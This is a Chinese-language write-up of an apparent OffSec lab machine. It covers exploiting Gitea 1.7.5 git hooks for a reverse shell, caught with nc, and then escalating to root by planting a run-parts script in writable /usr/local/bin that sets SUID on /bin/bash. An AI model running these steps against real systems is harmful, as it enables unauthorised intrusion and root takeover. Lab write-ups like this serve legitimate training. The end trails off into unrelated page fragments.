主要知识点
- githook 注入
- Linux path覆盖
具体步骤
依旧是nmap扫描开始,3000端口不是很熟悉,先看一下
Nmap scan report for 192.168.54.67
Host is up (0.00083s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5b
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:77:6f:b1:ed:65:b5:ad:14:64:40:d2:24:d3:9c:0d (RSA)
| 256 a9:b4:4f:61:2e:2d:9d:4c:48:15:fe:70:8e:fa:af:b3 (ECDSA)
|_ 256 92:56:eb:af:c9:34:af:ea:a1:cf:9f:e1:90:dd:2f:61 (ED25519)
53/tcp closed domain
2222/tcp open ssh Dropbear sshd 2016.74 (protocol 2.0)
3000/tcp open ppp?
发现是 gitea ,版本为1.7.5,
搜索一下得到 https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce,简单阅读一下发现是利用githook执行系统命令创建反弹shell
尝试利用弱密码登录http://192.168.156.67:300/发现失败,于是创建一个用户试试,再创建一个新项目后尝试更改githook
保存后在本地clone相关项目,做些更改后再提交,反弹shell创建成功
C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> vi test.txt C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git add * C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git commit -m "test1"
[master 9925c74] test11 file changed, 1 insertion(+), 1 deletion(-)C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git push origin master
Username for 'http://192.168.156.67:3000': timothy
Password for 'http://timothy@192.168.156.67:3000':
remote: invalid credentials
fatal: Authentication failed for 'http://192.168.156.67:3000/timothy/Test/'C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort\Test> git push origin master
Username for 'http://192.168.156.67:3000': timothy
Password for 'http://timothy@192.168.156.67:3000':
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 4 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 266 bytes | 266.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)C:\home\kali\Documents\OFFSEC\GoToWork\Roquefort> nc -nlvp 2222
listening on [any] 2222 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.156.67] 48668
bash: cannot set terminal process group (753): Inappropriate ioctl for device
bash: no job control in this shell
chloe@roquefort:~/gitea-repositories/timothy/test.git$ whoami
whoami
chloe
无法sudo,suid也没发现有用的信息,尝试上传Linpeas.sh发现该用户对于/usr/local/bin有写权限,所以也许可以覆盖linux path后面的命令来提权(linux寻找可执行文件是从path左到右的各个路径去找)
......
......
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
......
......再执行pspy64,发现run-parts会被定期执行,于是我们可以尝试覆盖run-parts
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855██▓███ ██████ ██▓███ ▓██ ██▓▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░ ░ ░ ░ ░ ░ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/10/27 19:34:31 CMD: UID=0 PID=92 |
2024/10/27 19:34:31 CMD: UID=0 PID=9 |
......
......
2024/10/27 19:35:01 CMD: UID=0 PID=14147 | /bin/sh -c cd / && run-parts --report /etc/cron.hourly
......
......
/bin/路径在path中的位置是在/usr/local/bin后面,所以成功提权
chloe@roquefort:~$ whereis run-parts
whereis run-parts
run-parts: /bin/run-parts /usr/share/man/man8/run-parts.8.gz
chloe@roquefort:~$ cd /usr/local/bin
lscd /usr/local/bin -l
chloe@roquefort:/usr/local/bin$
ls -l
total 63772
-rwxr-xr-x 1 root staff 65299840 Mar 6 2020 gitea
chloe@roquefort:/usr/local/bin$ echo "chmod +s /bin/bash" > run-parts
echo "chmod +s /bin/bash" > run-parts
chloe@roquefort:/usr/local/bin$ chmod +x run-parts
chmod +x run-partsl
chloe@roquefort:/usr/local/bin$ s -l
chloe@roquefort:/usr/local/bin$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1099016 May 15 2017 /bin/bash
chloe@roquefort:/usr/local/bin$ /bin/bash -p
/bin/bash -p
id
uid=1000(chloe) gid=1000(chloe) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(chloe)
cat /root/proof.txt
203a640d81971f425ddb028950a9c595
-QT-C/C++ - QT Stacked Widget)
--DisposableEffect)
(二)详解)
)
